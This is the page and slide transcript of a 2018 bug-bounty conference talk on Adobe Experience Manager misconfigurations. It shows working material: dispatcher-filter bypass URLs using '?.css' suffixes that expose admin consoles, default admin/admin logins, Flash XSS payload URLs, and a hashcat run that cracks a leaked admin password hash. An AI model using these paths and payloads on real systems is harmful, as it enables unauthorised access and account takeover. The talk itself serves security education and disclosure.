Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A story of the passive aggressive sysadmin of AEM

Frans Rosén
September 13, 2018
Technology
0
7.9k

A story of the passive aggressive sysadmin of AEM

# By Frans Rosén

Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.

Then came security.

Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.

# About speaker

Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.

Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.

Frans Rosén

September 13, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
780
Story of a RCE on Apple through hot jar swapping
fransrosen
0
950
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
160
A methodology using fuzzing and info disclosure
fransrosen
0
210
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.7k
Web based format injection, dumping memory like it's 99 (or "Please help")
fransrosen
0
65
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.6k

Other Decks in Technology

See All in Technology
Emacs x Nostr
hakkadaikon
1
150
AWSコンテナ本出版から3年経った今、もし改めて執筆し直すなら / If I revise our container book
iselegant
15
3.9k
アジャイルと契約 エッセンシャル版 / Agile Contracts Essential Edition
fkino
0
110
バクラクにおける可観測性向上の取り組み
yuu26
3
400
生成AIとAWS CDKで実現! 自社ブログレビューの効率化
ymae
2
310
ガバメントクラウド単独利用方式におけるIaC活用
techniczna
3
260
コンテンツを支える 若手ゲームクリエイターの アートディレクションの事例紹介 / cagamefi-game
cyberagentdevelopers
PRO
1
110
Jr. Championsになって、強く連携しながらAWSをもっと使いたい!~AWSに対する期待と行動~
amixedcolor
0
170
大規模データ基盤チームのオンプレTiDB運用への挑戦 / dpu-tidb
cyberagentdevelopers
PRO
1
110
現地でMeet Upをやる場合の注意点 〜反省点を添えて〜
shotashiratori
0
480
で、ValhallaのValue Classってどうなったの?
skrb
1
660
オーティファイ会社紹介資料 / Autify Company Deck
autifyhq
9
120k

Featured

See All Featured
Art, The Web, and Tiny UX
lynnandtonic
296
20k
YesSQL, Process and Tooling at Scale
rocio
167
14k
How To Stay Up To Date on Web Technology
chriscoyier
788
250k
Why You Should Never Use an ORM
jnunemaker
PRO
53
9k
Docker and Python
trallard
40
3.1k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
37
1.8k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
32
1.8k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
48k
Navigating Team Friction
lara
183
14k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
131
33k
RailsConf 2023
tenderlove
29
880
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
159
15k

Transcript

  1. @fransrosen A story of the passive aggressive sysadmin of AEM

    or "How to make a talk in 3h 35min"

  2. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once

  3. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat

  4. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  5. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957

  6. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957 "The world’s lamest

    RCE."

  7. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  8. @fransrosen How AEM is structured Adobe "black magic glue"

  9. @fransrosen How AEM is structured Stuff you pay your consultants

    for Adobe "black magic glue"

  10. @fransrosen Shit no one’s updating Stuff you pay your consultants

    for Adobe "black magic glue" How AEM is structured

  11. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  12. @fransrosen How AEM is structured Apache HTTP server module

  13. @fransrosen How AEM is structured Reverse proxy+filter Apache HTTP server

    module

  14. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter

  15. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter A bunch of admin-tools

  16. @fransrosen How AEM is structured You should not have access

    to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools

  17. @fransrosen How AEM is structured You should not have access

    to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content

  18. @fransrosen Creating pages

  19. @fransrosen Creating pages Author creates a new page in the

    repo

  20. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes

  21. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes Dispatcher serves the content

  22. @fransrosen Accessing pages

  23. @fransrosen Accessing pages Dispatcher gets the URL

  24. @fransrosen Accessing pages Dispatcher gets the URL Goes through a

    filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  25. @fransrosen Accessing pages Dispatcher gets the URL If all is

    OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  26. @fransrosen CVE-2016-0957 aka "I am two years old but I’m

    inside an enterprise product that no one can or dares to upgrade"

  27. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  28. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  29. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  30. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  31. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  32. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  33. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  34. @fransrosen This is ridiculous

  35. @fransrosen Accessing pages?.css Dispatcher gets the URL?.css

  36. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time

  37. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time Serve from publish node

  38. @fransrosen Publish nodes

  39. @fransrosen Disk usage /etc/reports/diskusage.html?.css Disk Usage lists all repo dirs

    + metadata

  40. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  41. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  42. @fransrosen …but there’s more!

  43. @fransrosen CRX Explorer /crx/de/index.jsp?.css

  44. @fransrosen CRX Explorer /crx/explorer/browser/index.jsp?.css

  45. @fransrosen CRX Explorer Search /crx/explorer/browser/index.jsp?.css

  46. @fransrosen Content Repository Extreme /crx/explorer/index.jsp?.css

  47. @fransrosen Package Manager /crx/packmgr/index.jsp?.css

  48. @fransrosen Namespace Editor (no auth needed!) /crx/explorer/ui/namespace_editor.jsp?.css

  49. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  50. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  51. @fransrosen

  52. @fransrosen bin/querybuilder for SWFs!

  53. @fransrosen bin/querybuilder for SWFs!

  54. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  55. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  56. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String

  57. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  58. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  59. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole

  60. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole

  61. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole

  62. @fransrosen Allowing anonymous publish access

  63. @fransrosen Allowing anonymous publish access

  64. @fransrosen Allowing anonymous publish access

  65. @fransrosen but Peter mentioned RCE?

  66. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  67. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html admin / admin

  68. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  69. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  70. @fransrosen Patch for CVE-2016-0957

  71. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  72. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  73. @fransrosen Patch for CVE-2016-0957 THEN WHAT IS THE PROBLEM? WOHO!

    WOHO!

  74. @fransrosen Problem 1

  75. @fransrosen Problem 1

  76. @fransrosen Problem 1 PRIORITY: nah, bro

  77. @fransrosen Problem 2

  78. @fransrosen Problem 2

  79. @fransrosen Patch for CVE-2016-0957 IRL VERSION

  80. @fransrosen Patch for CVE-2016-0957 IRL

  81. @fransrosen Patch for CVE-2016-0957 IRL

  82. @fransrosen Patch for CVE-2016-0957 IRL

  83. @fransrosen Bypasses, seriously ?.js ;%0a.css Thank Jasmin Landry for this

    one

  84. @fransrosen The passive agressive sysadmin

  85. @fransrosen The passive agressive sysadmin + +

  86. @fransrosen The passive agressive sysadmin + +

  87. @fransrosen I’ve seen this before

  88. @fransrosen AEM

  89. @fransrosen CRX

  90. @fransrosen CRXDE

  91. @fransrosen All other stuff

  92. @fransrosen /system/console

  93. @fransrosen /system/console admin / admin

  94. @fransrosen /system/console admin / admin

  95. @fransrosen Report!

  96. @fransrosen Search time!

  97. @fransrosen Search time!

  98. @fransrosen Search time!

  99. @fransrosen Search time!

  100. @fransrosen WTF

  101. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n')

  102. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798

  103. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt

  104. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt 
 Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018

  105. @fransrosen hashcat ftw ih8uall

  106. @fransrosen /system/console

  107. @fransrosen /system/console admin / ih8uall

  108. @fransrosen /system/console

  109. @fransrosen /system/console

  110. @fransrosen Report 2

  111. @fransrosen Report 2

  112. @fransrosen Report 2

  113. @fransrosen Public bug bounty programs with AEM Public responsible disclosure

    Private ones

  114. @fransrosen Thanks!